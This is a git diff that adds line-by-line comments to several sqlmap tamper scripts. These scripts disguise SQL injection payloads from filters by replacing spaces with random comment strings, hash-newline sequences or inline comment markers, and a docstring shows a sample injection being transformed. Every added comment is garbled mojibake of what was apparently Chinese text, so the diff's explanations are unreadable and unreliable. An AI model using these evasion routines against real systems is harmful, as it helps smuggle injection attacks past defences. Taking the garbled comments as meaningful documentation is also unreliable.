濡傛灉鏄┖鏍间笖涔嬪墠娌℃湁閬囧埌杩囧弻寮曞彿鍜屽崟寮曞彿 elif payload[i] == " " and not doublequote and not quote: retVal += "/**/" continue - + # 娣诲姞褰撳墠瀛楃鍒皉etVal retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2dash.py b/src/sqlmap-master/tamper/space2dash.py index 5ecb814..298d26f 100644 --- a/src/sqlmap-master/tamper/space2dash.py +++ b/src/sqlmap-master/tamper/space2dash.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import random import string +# 浠巗qlmap鐨勫簱涓鍏ュ吋瀹规ā鍧椾腑鐨剎range鍑芥暟鍜屼紭鍏堢骇鏋氫妇 from lib.core.compat import xrange from lib.core.enums import PRIORITY @@ -30,18 +31,29 @@ def tamper(payload, **kwargs): >>> tamper('1 AND 9227=9227') '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227' """ - + retVal = "" if payload: + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): - if payload[i].isspace(): + # 濡傛灉褰撳墠瀛楃鏄┖鏍 + if payload[i].isspace(): + # 鐢熸垚涓涓殢鏈哄瓧绗︿覆 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 灏嗛殢鏈哄瓧绗︿覆鍜屾崲琛岀娣诲姞鍒皉etVal涓 retVal += "--%s%%0A" % randomStr + + # 濡傛灉褰撳墠瀛楃鏄#鎴栬#鍚庨潰璺熺潃涓や釜绌烘牸 + # 濡傛灉payload[i]绛変簬#鎴栬卲ayload[i:i + 3]绛変簬-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload[i:]娣诲姞鍒皉etVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯锛屽皢payload[i]娣诲姞鍒皉etVal涓 else: retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/space2hash.py b/src/sqlmap-master/tamper/space2hash.py index 2cef84d..348fd20 100644 --- a/src/sqlmap-master/tamper/space2hash.py +++ b/src/sqlmap-master/tamper/space2hash.py @@ -16,7 +16,9 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬妫鏌ヨ剼鏈緷璧 def dependencies(): + # 杈撳嚭璀﹀憡淇℃伅锛屾彁绀鸿剼鏈彧鑳借繍琛屽湪MySQL鏁版嵁搴撲笂 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -41,15 +43,26 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload涓嶄负绌 if payload: + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍 if payload[i].isspace(): + # 鐢熸垚涓涓殢鏈哄瓧绗︿覆 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 灏嗛殢鏈哄瓧绗︿覆娣诲姞鍒皉etVal涓 retVal += "%%23%s%%0A" % randomStr + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload鐨勫墿浣欓儴鍒嗘坊鍔犲埌retVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯 else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/space2morecomment.py b/src/sqlmap-master/tamper/space2morecomment.py index c5d7ec4..7cffc12 100644 --- a/src/sqlmap-master/tamper/space2morecomment.py +++ b/src/sqlmap-master/tamper/space2morecomment.py @@ -33,23 +33,29 @@ def tamper(payload, **kwargs): retVal = "" quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉绗竴涓瓧绗︿笉鏄┖鏍硷紝鍒欏皢firstspace璁剧疆涓篢rue锛屽苟灏唕etVal娣诲姞"/**_**/" if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**_**/" continue + # 濡傛灉瀛楃鏄崟寮曞彿锛屽垯灏唓uote鍙栧弽 elif payload[i] == '\'': quote = not quote + # 濡傛灉瀛楃鏄弻寮曞彿锛屽垯灏哾oublequote鍙栧弽 elif payload[i] == '"': doublequote = not doublequote + # 濡傛灉瀛楃鏄┖鏍硷紝涓斾笉鏄湪鍙屽紩鍙锋垨鍗曞紩鍙蜂腑锛屽垯灏唕etVal娣诲姞"/**_**/" elif payload[i] == " " and not doublequote and not quote: retVal += "/**_**/" continue + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] return retVal